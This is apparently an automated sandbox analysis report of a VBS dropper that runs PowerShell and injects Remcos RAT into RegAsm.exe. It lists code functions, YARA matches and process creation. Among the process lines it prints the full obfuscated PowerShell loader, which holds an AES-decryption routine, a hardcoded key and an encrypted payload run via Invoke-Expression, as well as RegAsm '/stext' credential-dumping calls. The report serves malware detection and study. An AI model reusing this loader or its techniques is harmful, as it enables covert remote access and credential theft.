                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00436FEA3_2_00436FEA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_100171943_2_10017194
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_1000B5C13_2_1000B5C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044B0404_2_0044B040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043610D4_2_0043610D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004473104_2_00447310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044A4904_2_0044A490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040755A4_2_0040755A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043C5604_2_0043C560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044B6104_2_0044B610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044D6C04_2_0044D6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004476F04_2_004476F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044B8704_2_0044B870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044081D4_2_0044081D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004149574_2_00414957
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004079EE4_2_004079EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00407AEB4_2_00407AEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044AA804_2_0044AA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00412AA94_2_00412AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00404B744_2_00404B74
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00404B034_2_00404B03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044BBD84_2_0044BBD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00404BE54_2_00404BE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00404C764_2_00404C76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00415CFE4_2_00415CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00416D724_2_00416D72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00446D304_2_00446D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00446D8B4_2_00446D8B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00406E8F4_2_00406E8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004050385_2_00405038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041208C5_2_0041208C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004050A95_2_004050A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040511A5_2_0040511A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043C13A5_2_0043C13A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004051AB5_2_004051AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004493005_2_00449300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040D3225_2_0040D322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0044A4F05_2_0044A4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043A5AB5_2_0043A5AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004136315_2_00413631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004466905_2_00446690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0044A7305_2_0044A730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004398D85_2_004398D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004498E05_2_004498E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0044A8865_2_0044A886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043DA095_2_0043DA09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00438D5E5_2_00438D5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00449ED05_2_00449ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041FE835_2_0041FE83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00430F545_2_00430F54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004050C27_2_004050C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004014AB7_2_004014AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004051337_2_00405133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004051A47_2_004051A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004012467_2_00401246
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040CA467_2_0040CA46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004052357_2_00405235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004032C87_2_004032C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004016897_2_00401689
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00402F607_2_00402F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E10 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434770 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                    Source: screensimplethingstohandlecream.gIF.vbsInitial sample: Strings found which are bigger than 50
                    Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 1.2.powershell.exe.1f163071700.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 1.2.powershell.exe.1f163071700.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 1.2.powershell.exe.1f163071700.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 1.2.powershell.exe.1f163071700.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 1.2.powershell.exe.1f163071700.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 1.2.powershell.exe.1f163071700.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000001.00000002.1760253899.000001F162D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 6744, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 6744, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: RegAsm.exe PID: 1344, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winVBS@14/7@2/4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,4_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,3_2_00417952
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,7_2_00410DE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,4_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,3_2_0040F474
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,3_2_0041B4A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_0041AA4A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].jsonJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-F4JFYD
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3q0gvrle.w22.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: RegAsm.exe, RegAsm.exe, 00000005.00000002.1738322780.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: RegAsm.exe, 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: RegAsm.exe, 00000004.00000002.1747480644.000000000267A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: screensimplethingstohandlecream.gIF.vbsVirustotal: Detection: 9%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkpfvnsml"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xeupwfcgzmvn"
